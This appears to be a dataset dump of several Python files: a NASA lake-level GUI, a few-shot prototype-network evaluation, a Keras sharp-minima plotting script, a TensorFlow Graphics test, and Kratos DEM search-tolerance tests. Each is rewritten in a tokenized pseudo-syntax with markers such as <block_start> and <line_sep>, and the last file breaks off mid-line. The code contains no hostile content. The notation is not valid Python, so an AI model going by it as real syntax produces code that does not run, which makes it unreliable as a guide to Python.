content
stringlengths
0
1.55M
# ----------------------------------------------------------------------------- # Copyright * 2014, United States Government, as represented by the # Administrator of the National Aeronautics and Space Administration. All # rights reserved. # # The Crisis Mapping Toolkit (CMT) v1 platform is licensed under the Apache # License, Version 2.0 (the "License"); you may not use this file except in # compliance with the License. You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0. # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. # ----------------------------------------------------------------------------- <import_from_stmt>PyQt4 QtGui QtCore<import_stmt>sys<import_from_stmt>threading Thread<import_from_stmt>LLAMA Ui_Lake_Level_UI<import_from_stmt>plot_water_levelui *<import_from_stmt>lake_measure *<class_stmt>ProgressPopup(QtGui.QWidget)<block_start>update_signal=QtCore.pyqtSignal(int int str str int int)<def_stmt>__init__ self cancel_function<block_start>QtGui.QWidget.__init__(self)<line_sep>self.update_signal.connect(self.apply_update QtCore.Qt.QueuedConnection)<line_sep>self.cancel_function=cancel_function<line_sep>self.lake_totals=<none><line_sep>self.lake_counts=<none><line_sep>self.progressBar=QtGui.QProgressBar(self)<line_sep>self.progressBar.setMinimumSize(500 50)<line_sep>self.progressBar.setMaximumSize(500 50)<line_sep>self.progressBar.setRange(0 100)<line_sep>self.progressBar.setValue(0)<line_sep>self.status=QtGui.QLabel(self)<line_sep>self.status.setText("")<line_sep>self.cancelButton=QtGui.QPushButton('Cancel' self)<line_sep>self.cancelButton.setMinimumSize(50 30)<line_sep>self.cancelButton.setMaximumSize(100 50)<line_sep>self.cancelButton.clicked[bool].connect(self._cancel)<line_sep>vbox=QtGui.QVBoxLayout(self)<line_sep>vbox.addWidget(self.progressBar)<line_sep>vbox.addWidget(self.status)<line_sep>vbox.addWidget(self.cancelButton)<line_sep>vbox.addStretch(1)<line_sep>self.setLayout(vbox)<block_end><def_stmt>update_function self lakes_number lakes_total lake_name lake_date lake_image lake_image_total<block_start>self.update_signal.emit(lakes_number lakes_total lake_name lake_date lake_image lake_image_total)<block_end><def_stmt>apply_update self lakes_number lakes_total lake_name lake_date lake_image lake_image_total<block_start><if_stmt>self.lake_totals<eq><none><block_start>self.lake_totals=[10]<times>lakes_total<line_sep>self.lake_counts=[0]<times>lakes_total<block_end>self.lake_totals[lakes_number]=lake_image_total<line_sep>self.lake_counts[lakes_number]=lake_image<line_sep>total=sum(self.lake_totals)<line_sep>progress=sum(self.lake_counts)<line_sep>self.status.setText('Completed processing %s on %s.'%(lake_name lake_date))<line_sep>self.progressBar.setValue(float(progress)/total<times>100)<block_end><def_stmt>closeEvent self event<block_start><if_stmt>self.cancel_function<ne><none><block_start>self.cancel_function()<block_end>event.accept()<block_end><def_stmt>_cancel self<block_start>self.close()<block_end><block_end><class_stmt>Lake_Level_App(QtGui.QMainWindow Ui_Lake_Level_UI)<block_start><def_stmt>__init__ self<block_start>super(self.__class__ self).__init__()<line_sep>self.setupUi(self)<line_sep>self.start_date='1984-04-25'<line_sep># Sets end date to current date. self.end_date=str((QtCore.QDate.currentDate()).toString('yyyy-MM-dd'))<line_sep>self.selected_lake='Lake Tahoe'<line_sep>self.selectlakeDropMenu.activated[str].connect(self.selectLakeHandle)<line_sep>self.okBtn.clicked.connect(self.okHandle)<line_sep># Sets end date as current date. Couldn't set this option in QT Designer self.endDate.setDate(QtCore.QDate.currentDate())<line_sep>self.endDate.dateChanged[QtCore.QDate].connect(self.endHandle)<line_sep>self.startDate.dateChanged[QtCore.QDate].connect(self.startHandle)<line_sep>self.faiState=<false><line_sep>self.ndtiState=<false><line_sep>self.completedSignal.connect(self.completeLakeThread QtCore.Qt.QueuedConnection)<block_end><def_stmt>selectLakeHandle self text<block_start>self.selected_lake=str(text)<block_end><def_stmt>startHandle self date<block_start>self.start_date=str(date.toString('yyyy-MM-dd'))<block_end><def_stmt>endHandle self date<block_start>self.end_date=str(date.toString('yyyy-MM-dd'))<block_end>completedSignal=QtCore.pyqtSignal()<line_sep>@QtCore.pyqtSlot()<def_stmt>completeLakeThread self<block_start><if_stmt>self.tableCheckbox.isChecked()<block_start>table_water_level(self.selected_lake self.start_date self.end_date result_dir='results' output_file=self.table_output_file)<block_end><if_stmt>self.graphCheckbox.isChecked()<block_start>plot_water_level(self.selected_lake self.start_date self.end_date result_dir='results')<block_end>self.popup.close()<block_end><def_stmt>okHandle self<block_start><if_stmt>self.algaeCheckbox.isChecked()<block_start>self.faiState=<true><block_end><else_stmt><block_start>self.faiState=<false><block_end><if_stmt>self.turbidityCheckbox.isChecked()<block_start>self.ndtiState=<true><block_end><else_stmt><block_start>self.ndtiState=<false><block_end># Heat map checkbox is not functioning. Add under here: # if self.lake_areaCheckbox.isChecked(): <if_stmt>self.tableCheckbox.isChecked()<block_start>self.table_output_file=QtGui.QFileDialog.getSaveFileName(self 'Choose Output File' 'results/'+self.selected_lake+'.csv' 'CSV File (*.csv *.txt)')<block_end>self.popup=ProgressPopup(Lake_Level_Cancel)<line_sep>self.lake_thread=Thread(target=Lake_Level_Run args=(self.selected_lake self.start_date self.end_date 'results' self.faiState self.ndtiState self.popup.update_function self.completedSignal.emit))<line_sep>self.popup.show()<line_sep>self.lake_thread.start()<line_sep># CHANGE THIS. NEED TO MAKE THESE PARTS WAIT UNTIL LAKE_THREAD IS FINISHED. <block_end><block_end><def_stmt>main <block_start>app=QtGui.QApplication(sys.argv)# A new instance of QApplication form=Lake_Level_App()# We set the form to be our ExampleApp (design) form.show()# Show the form app.exec_()# and execute the app <block_end><if_stmt>__name__<eq>'__main__'# if we're running file directly and not importing it <block_start>main()<block_end>
"""Runs a baseline for prototype networks for incremental few-shot learning. Author: <NAME> (<EMAIL>) See run_exp.py for usage. """<import_from_future_stmt> absolute_import division print_function unicode_literals <import_stmt>numpy<as>np<import_stmt>os<import_stmt>six<import_stmt>tensorflow<as>tf<import_from_stmt>tqdm tqdm<import_from_stmt>fewshot.utils logger<import_from_stmt>run_exp get_config get_restore_saver get_datasets get_model save_config get_exp_logger get_saver restore_model final_log <import_from_stmt>train_lib get_metadata<line_sep>log=logger.get()<line_sep>FLAGS=tf.flags.FLAGS<def_stmt>calculate_protos sess model num_classes_a task_a_it num_steps<block_start>"""Calculates the prototypes of the entire training set."""<line_sep>prototypes=[]<for_stmt>idx six.moves.xrange(num_classes_a)<block_start>prototypes.append([])<block_end><for_stmt>step six.moves.xrange(num_steps)<block_start>x,y=task_a_it.next()<line_sep>h=sess.run(model.h_a feed_dict={model.inputs:x})<for_stmt>jj,idx enumerate(y)<block_start>prototypes[idx].append(h[jj])<block_end><block_end><for_stmt>idx six.moves.xrange(num_classes_a)<block_start>prototypes[idx]=np.array(prototypes[idx]).mean(axis=0)<block_end><return>np.array(prototypes)<block_end><def_stmt>calculate_episode_protos sess model num_classes_a nway episode old_and_new<block_start>"""Caluclates the prototypes of a single episode."""<line_sep>prototypes=[]<for_stmt>idx six.moves.xrange(nway)<block_start>prototypes.append([])<block_end>h=sess.run(model.h_a feed_dict={model.inputs:episode.x_train})<for_stmt>idx six.moves.xrange(episode.x_train.shape[0])<block_start><if_stmt>old_and_new<block_start>prototypes[episode.y_train[idx]-num_classes_a].append(h[idx])<block_end><else_stmt><block_start>prototypes[episode.y_train[idx]].append(h[idx])<block_end><block_end><for_stmt>idx six.moves.xrange(nway)<block_start>prototypes[idx]=np.array(prototypes[idx]).mean(axis=0)<block_end><return>np.array(prototypes)<block_end><def_stmt>cosine h protos<block_start>"""Cosine similarity."""<line_sep>proto_t=protos.T<line_sep>result=np.dot(h proto_t)/np.sqrt(np.sum(h<power>2 axis=1 keepdims=<true>))/np.sqrt(np.sum(proto_t<power>2 axis=0 keepdims=<true>))<line_sep><return>result<block_end><def_stmt>euclidean h protos<block_start>"""Euclidean similarity."""<line_sep>h_=np.expand_dims(h 1)<line_sep>protos_=np.expand_dims(protos 0)<line_sep><return>-np.sum((h_-protos_)<power>2 axis=2)<block_end><def_stmt>dot h protos<block_start>"""Dot product."""<line_sep><return>np.dot(h protos.T)<block_end><def_stmt>evaluate_b sess model task_it num_steps num_classes_a num_classes_b prototypes_a=<none> old_and_new=<false> similarity='euclidean'<block_start>"""Evaluate the model on task A."""<line_sep>acc_list=np.zeros([num_steps])<if_stmt>old_and_new<block_start>acc_list_old=np.zeros([num_steps])<line_sep>acc_list_new=np.zeros([num_steps])<line_sep>acc_list_old2=np.zeros([num_steps])<line_sep>acc_list_new2=np.zeros([num_steps])<block_end>it=tqdm(six.moves.xrange(num_steps) ncols=0)<for_stmt>tt it<block_start>task_data=task_it.next()<line_sep>prototypes_b=calculate_episode_protos(sess model num_classes_a num_classes_b task_data old_and_new)<if_stmt>old_and_new<block_start>all_prototypes=np.concatenate([prototypes_a prototypes_b])<block_end><else_stmt><block_start>all_prototypes=prototypes_b<block_end>h_test=sess.run(model.h_a feed_dict={model.inputs:task_data.x_test})<if_stmt>similarity<eq>'cosine'<block_start>logits=cosine(h_test all_prototypes)<block_end><elif_stmt>similarity<eq>'euclidean'<block_start>logits=euclidean(h_test all_prototypes)<block_end><elif_stmt>similarity<eq>'dot'<block_start>logits=dot(h_test all_prototypes)<block_end><else_stmt><block_start><raise>ValueError('Unknown similarity function')<block_end>correct=np.equal(np.argmax(logits axis=1) task_data.y_test).astype(np.float32)<line_sep>_acc=correct.mean()<line_sep>acc_list[tt]=_acc<if_stmt>old_and_new<block_start>is_new=task_data.y_test<ge>num_classes_a<line_sep>is_old=np.logical_not(is_new)<line_sep>_acc_old=correct[is_old].mean()<line_sep>_acc_new=correct[is_new].mean()<line_sep>correct_new=np.equal(np.argmax(logits[is_new num_classes_a:] axis=1) task_data.y_test[is_new]-num_classes_a).astype(np.float32)<line_sep>_acc_new2=correct_new.mean()<line_sep>correct_old=np.equal(np.argmax(logits[is_old :num_classes_a] axis=1) task_data.y_test[is_old]).astype(np.float32)<line_sep>_acc_old2=correct_old.mean()<line_sep>acc_list_old[tt]=_acc_old<line_sep>acc_list_new[tt]=_acc_new<line_sep>acc_list_new2[tt]=_acc_new2<line_sep>acc_list_old2[tt]=_acc_old2<line_sep>it.set_postfix(acc_b=u'{:.3f}±{:.3f}'.format(np.array(acc_list).sum()<times>100.0/float(tt+1) np.array(acc_list).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_old=u'{:.3f}±{:.3f}'.format(np.array(acc_list_old).sum()<times>100.0/float(tt+1) np.array(acc_list_old).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_old2=u'{:.3f}±{:.3f}'.format(np.array(acc_list_old2).sum()<times>100.0/float(tt+1) np.array(acc_list_old2).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_new=u'{:.3f}±{:.3f}'.format(np.array(acc_list_new).sum()<times>100.0/float(tt+1) np.array(acc_list_new).std()/np.sqrt(float(tt+1))<times>100.0) acc_b_new2=u'{:.3f}±{:.3f}'.format(np.array(acc_list_new2).sum()<times>100.0/float(tt+1) np.array(acc_list_new2).std()/np.sqrt(float(tt+1))<times>100.0))<block_end><else_stmt><block_start>it.set_postfix(acc_b=u'{:.3f}±{:.3f}'.format(np.array(acc_list).sum()<times>100.0/float(tt+1) np.array(acc_list).std()/np.sqrt(float(tt+1))<times>100.0))<block_end><block_end>results_dict={'acc':acc_list.mean() 'acc_se':acc_list.std()/np.sqrt(float(acc_list.size))}<if_stmt>old_and_new<block_start>results_dict['acc_old']=acc_list_old.mean()<line_sep>results_dict['acc_old_se']=acc_list_old.std()/np.sqrt(float(acc_list_old.size))<line_sep>results_dict['acc_old2']=acc_list_old2.mean()<line_sep>results_dict['acc_old2_se']=acc_list_old2.std()/np.sqrt(float(acc_list_old2.size))<line_sep>results_dict['acc_new']=acc_list_new.mean()<line_sep>results_dict['acc_new_se']=acc_list_new.std()/np.sqrt(float(acc_list_new.size))<line_sep>results_dict['acc_new2']=acc_list_new2.mean()<line_sep>results_dict['acc_new2_se']=acc_list_new2.std()/np.sqrt(float(acc_list_new2.size))<line_sep>results_dict['delta_a']=results_dict['acc_old']-results_dict['acc_old2']<line_sep>results_dict['delta_b']=results_dict['acc_new']-results_dict['acc_new2']<line_sep>results_dict['delta']=0.5<times>(results_dict['delta_a']+results_dict['delta_b'])<block_end><return>results_dict<block_end><def_stmt>main # ------------------------------------------------------------------------ # Flags <block_start>nshot=FLAGS.nshot<line_sep>dataset=FLAGS.dataset<line_sep>nclasses_train=FLAGS.nclasses_b<line_sep>nclasses_val=FLAGS.nclasses_b<line_sep>nclasses_test=FLAGS.nclasses_b<line_sep>num_test=FLAGS.ntest<line_sep>is_eval=FLAGS.eval<line_sep>nepisode_final=FLAGS.nepisode_final<line_sep>run_test=FLAGS.test<line_sep>pretrain=FLAGS.pretrain<line_sep>retest=FLAGS.retest<line_sep>tag=FLAGS.tag<line_sep># ------------------------------------------------------------------------ # Configuration config=get_config(FLAGS.config)<line_sep>opt_config=config.optimizer_config<line_sep>old_and_new=config.transfer_config.old_and_new<line_sep>similarity=config.protonet_config.similarity<line_sep># ------------------------------------------------------------------------ # Log folder <assert_stmt>tag<is><not><none> 'Please add a name for the experiment'<line_sep>log_folder=os.path.join(FLAGS.results dataset 'n{}w{}'.format(nshot nclasses_val) tag)<line_sep>log.info('Experiment ID {}'.format(tag))<if_stmt><not>os.path.exists(log_folder)<block_start>os.makedirs(log_folder)<block_end><elif_stmt><not>is_eval<block_start><assert_stmt><false> 'Folder {} exists. Pick another tag.'.format(log_folder)<block_end># ------------------------------------------------------------------------ # Model metadata=get_metadata(dataset)<with_stmt>log.verbose_level(2)<block_start>model_dict=get_model(config metadata['num_classes_a'] nclasses_train nclasses_val nclasses_test is_eval=is_eval)<line_sep>model=model_dict['val']<line_sep>modelv=model_dict['val']<block_end># ------------------------------------------------------------------------ # Dataset seed=0<with_stmt>log.verbose_level(2)<block_start>data=get_datasets(dataset metadata nshot num_test opt_config.batch_size opt_config.num_gpu metadata['num_classes_a'] nclasses_train nclasses_val nclasses_test old_and_new seed <true>)<block_end># ------------------------------------------------------------------------ # Save configurations save_config(config log_folder)<line_sep># ------------------------------------------------------------------------ # Log outputs restore_saver=get_restore_saver(retest=retest cosine_a=modelv.config.protonet_config.cosine_a reinit_tau=modelv.config.protonet_config.reinit_tau)<line_sep>logger=get_exp_logger(log_folder)<line_sep>saver=get_saver(log_folder)<line_sep># ------------------------------------------------------------------------ # Create a TensorFlow session sess_config=tf.ConfigProto()<line_sep>sess_config.gpu_options.allow_growth=<true><line_sep>sess=tf.Session(config=sess_config)<line_sep># ------------------------------------------------------------------------ # Initialize model restore_model(sess model modelv restore_saver is_eval=is_eval pretrain=pretrain)<line_sep># ------------------------------------------------------------------------ # Calculate prototypes A. <if_stmt>old_and_new<block_start>prototypes_a=calculate_protos(sess model model.num_classes_a data['a_train'] nepisode_final)<block_end><else_stmt><block_start>prototypes_a=<none><block_end># ------------------------------------------------------------------------ # Run on val set. results={}<line_sep>results['val_b']=evaluate_b(sess model data['b_val'] nepisode_final model.num_classes_a nclasses_val prototypes_a=prototypes_a old_and_new=old_and_new similarity=similarity)<line_sep># ------------------------------------------------------------------------ # Run on test set. <if_stmt>run_test<block_start>results['test_b']=evaluate_b(sess model data['b_test'] nepisode_final model.num_classes_a nclasses_val prototypes_a=prototypes_a old_and_new=old_and_new similarity=similarity)<block_end># ------------------------------------------------------------------------ # Log results. final_log(log_folder results old_and_new=old_and_new)<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
''' Train CNNs on the CIFAR10/CIFAR100 Plots a parametric plot between SB and LB minimizers demonstrating the relative sharpness of the two minima. Requirements: - Keras (with Theano) - Matplotlib - Numpy GPU run command: KERAS_BACKEND=theano python plot_parametric_plot.py --network C[1-4] '''<import_from_future_stmt> print_function<import_from_stmt>keras.datasets cifar10 cifar100<import_from_stmt>keras.preprocessing.image ImageDataGenerator<import_from_stmt>keras.models Sequential<import_from_stmt>keras.layers Dense Dropout Activation Flatten<import_from_stmt>keras.layers Convolution2D MaxPooling2D<import_from_stmt>keras.utils np_utils<import_stmt>numpy<import_stmt>matplotlib.pyplot<as>plt<import_stmt>argparse<import_stmt>network_zoo<line_sep>parser=argparse.ArgumentParser(description='''This code first trains the user-specific network (C[1-4]) using small-batch ADAM and large-batch ADAM, and then plots the parametric plot connecting the two minimizers illustrating the sharpness difference.''')<line_sep>parser.add_argument('-n' '--network' help='''Selects which network to plot the parametric plots for. Choices are C1, C2, C3 and C4.''' required=<true>)<line_sep>network_choice=vars(parser.parse_args())['network']<line_sep>nb_epoch=20<line_sep># the data, shuffled and split between train and test sets <if_stmt>network_choice<in>['C1' 'C2']<block_start>(X_train y_train),(X_test y_test)=cifar10.load_data()<line_sep>nb_classes=10<block_end><elif_stmt>network_choice<in>['C3' 'C4']<block_start>(X_train y_train),(X_test y_test)=cifar100.load_data()<line_sep>nb_classes=100<block_end><else_stmt><block_start><raise>ValueError('''Invalid choice of network. Please choose one of C1, C2, C3 or C4. Refer to the paper for details regarding these networks''')<block_end>X_train=X_train.astype('float32')<line_sep>X_test=X_test.astype('float32')<line_sep>X_train<augdiv>255<line_sep>X_test<augdiv>255<line_sep># convert class vectors to binary class matrices Y_train=np_utils.to_categorical(y_train nb_classes)<line_sep>Y_test=np_utils.to_categorical(y_test nb_classes)<line_sep># build the network <if_stmt>network_choice<in>['C1' 'C3']<block_start>model=network_zoo.shallownet(nb_classes)<block_end><elif_stmt>network_choice<in>['C2' 'C4']<block_start>model=network_zoo.deepnet(nb_classes)<block_end># let's train the model using Adam model.compile(loss='categorical_crossentropy' optimizer='adam' metrics=['accuracy'])<line_sep>model.save_weights('x0.h5')<line_sep># let's first find the small-batch solution model.fit(X_train Y_train batch_size=256 nb_epoch=nb_epoch validation_data=(X_test Y_test) shuffle=<true>)<line_sep>sb_solution=[p.get_value()<for>p model.trainable_weights]<line_sep># re-compiling to reset the optimizer accumulators model.compile(loss='categorical_crossentropy' optimizer='adam' metrics=['accuracy'])<line_sep># setting the initial (starting) point model.load_weights('x0.h5')<line_sep># now, let's train the large-batch solution model.fit(X_train Y_train batch_size=5000 nb_epoch=nb_epoch validation_data=(X_test Y_test))<line_sep>lb_solution=[p.get_value()<for>p model.trainable_weights]<line_sep># parametric plot data collection # we discretize the interval [-1,2] into 25 pieces alpha_range=numpy.linspace(-1 2 25)<line_sep>data_for_plotting=numpy.zeros((25 4))<line_sep>i=0<for_stmt>alpha alpha_range<block_start><for_stmt>p range(len(sb_solution))<block_start>model.trainable_weights[p].set_value(lb_solution[p]<times>alpha+sb_solution[p]<times>(1-alpha))<block_end>train_xent,train_acc=model.evaluate(X_train Y_train batch_size=5000 verbose=0)<line_sep>test_xent,test_acc=model.evaluate(X_test Y_test batch_size=5000 verbose=0)<line_sep>data_for_plotting[i :]=[train_xent train_acc test_xent test_acc]<line_sep>i<augadd>1<block_end># finally, let's plot the data # we plot the XENT loss on the left Y-axis # and accuracy on the right Y-axis # if you don't have Matplotlib, simply print # data_for_plotting to file and use a different plotter fig,ax1=plt.subplots()<line_sep>ax2=ax1.twinx()<line_sep>ax1.plot(alpha_range data_for_plotting[: 0] 'b-')<line_sep>ax1.plot(alpha_range data_for_plotting[: 2] 'b--')<line_sep>ax2.plot(alpha_range data_for_plotting[: 1]<times>100. 'r-')<line_sep>ax2.plot(alpha_range data_for_plotting[: 3]<times>100. 'r--')<line_sep>ax1.set_xlabel('alpha')<line_sep>ax1.set_ylabel('Cross Entropy' color='b')<line_sep>ax2.set_ylabel('Accuracy' color='r')<line_sep>ax1.legend(('Train' 'Test') loc=0)<line_sep>ax1.grid(b=<true> which='both')<line_sep>plt.savefig('Figures/'+network_choice+'.pdf')<line_sep>print('Plot save as '+network_choice+'.pdf in the Figures/ folder')<line_sep>
# Copyright 2020 The TensorFlow Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for feature representations."""<import_from_stmt>absl.testing parameterized<import_from_stmt>tensorflow_graphics.math feature_representation<import_from_stmt>tensorflow_graphics.util test_case<class_stmt>FeatureRepresentationTest(test_case.TestCase)<block_start>@parameterized.parameters((3 (3 )) (4 (2 3)) (8 (5 3 6)) )<def_stmt>test_random_rays_exception_exception_not_raised self num_frequencies *shapes<block_start>"""Tests that the shape exceptions are not raised."""<line_sep>self.assert_exception_is_not_raised(feature_representation.positional_encoding shapes num_frequencies=num_frequencies)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>test_case.main()<block_end>
<import_stmt>os<import_stmt>KratosMultiphysics<import_from_stmt>KratosMultiphysics Logger<line_sep>Logger.GetDefaultOutput().SetSeverity(Logger.Severity.WARNING)<import_stmt>KratosMultiphysics.KratosUnittest<as>KratosUnittest<import_stmt>KratosMultiphysics.DEMApplication.DEM_analysis_stage<import_stmt>numpy<as>np<import_stmt>auxiliary_functions_for_tests<line_sep>this_working_dir_backup=os.getcwd()<def_stmt>GetFilePath fileName<block_start><return>os.path.join(os.path.dirname(os.path.realpath(__file__)) fileName)<block_end><class_stmt>DEM3D_SearchToleranceMain(KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage KratosUnittest.TestCase)<block_start><def_stmt>Initialize self<block_start>super().Initialize()<for_stmt>node self.spheres_model_part.Nodes<block_start>self.initial_normal_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Z)<block_end><block_end>@classmethod<def_stmt>GetMainPath self<block_start><return>os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<block_end><def_stmt>GetProblemNameWithPath self<block_start><return>os.path.join(self.main_path self.DEM_parameters["problem_name"].GetString())<block_end><def_stmt>FinalizeSolutionStep self<block_start>super().FinalizeSolutionStep()<for_stmt>node self.spheres_model_part.Nodes#reference data with freq=1 searchtolerance=0.0 <block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.86502139707038<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.3859516373258987<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.5929799879392164<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><block_end><block_end><block_end><def_stmt>Finalize self<block_start>self.procedures.RemoveFoldersWithResults(str(self.main_path) str(self.problem_name) '')<line_sep>super().Finalize()<block_end><block_end><class_stmt>DEM3D_SearchTolerance1(DEM3D_SearchToleranceMain)<block_start><def_stmt>FinalizeSolutionStep self<block_start>KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)<for_stmt>node self.spheres_model_part.Nodes<block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.8654458179811835<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.3861319639727263<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.594495289987086<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><block_end><block_end><block_end><block_end><class_stmt>DEM3D_SearchTolerance2(DEM3D_SearchToleranceMain)<block_start><def_stmt>FinalizeSolutionStep self<block_start>KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)<for_stmt>node self.spheres_model_part.Nodes<block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.865445816566027<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.386128017385994<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.5941551772701182<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><block_end><block_end><block_end><block_end><class_stmt>DEM3D_SearchTolerance3(DEM3D_SearchToleranceMain)<block_start><def_stmt>FinalizeSolutionStep self<block_start>KratosMultiphysics.DEMApplication.DEM_analysis_stage.DEMAnalysisStage.FinalizeSolutionStep(self)<for_stmt>node self.spheres_model_part.Nodes<block_start><if_stmt>node.Id<eq>2<block_start>tol=1.0e-15<if_stmt>np.isclose(self.time 0.02 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-5.86502139707038<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.115 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-3.3859516373258987<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><if_stmt>np.isclose(self.time 0.22 rtol=0.0 atol=1e-06)<block_start>y_vel=node.GetSolutionStepValue(KratosMultiphysics.VELOCITY_Y)<line_sep>print(self.time y_vel)<line_sep>y_vel_ref=-0.5929799879392164<line_sep>self.assertAlmostEqual(y_vel y_vel_ref delta=tol)<block_end><block_end><block_end><block_end><block_end><class_stmt>TestSearchTolerance(KratosUnittest.TestCase)<block_start>@classmethod<def_stmt>test_SearchA self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path "ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(0.0)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(0.0)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(1)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchToleranceMain model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end>@classmethod<def_stmt>test_SearchB self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path "ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(0.0)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(0.0)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(10)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance1 model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end>@classmethod<def_stmt>test_SearchC self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) "test_search_tolerance")<line_sep>parameters_file_name=os.path.join(path "ProjectParametersDEM.json")<with_stmt>open(parameters_file_name 'r')<as>parameter_file<block_start>project_parameters=KratosMultiphysics.Parameters(parameter_file.read())<block_end>project_parameters["SearchTolerance"].SetDouble(1e-04)<line_sep>project_parameters["search_tolerance_against_walls"].SetDouble(1e-04)<line_sep>project_parameters["NeighbourSearchFrequency"].SetInt(20)<line_sep>model=KratosMultiphysics.Model()<line_sep>auxiliary_functions_for_tests.CreateAndRunStageInSelectedNumberOfOpenMPThreads(DEM3D_SearchTolerance2 model project_parameters auxiliary_functions_for_tests.GetHardcodedNumberOfThreads())<block_end>@classmethod<def_stmt>test_SearchD self<block_start>path=os.path.join(os.path.dirname(os.path.realpath(__file__)) 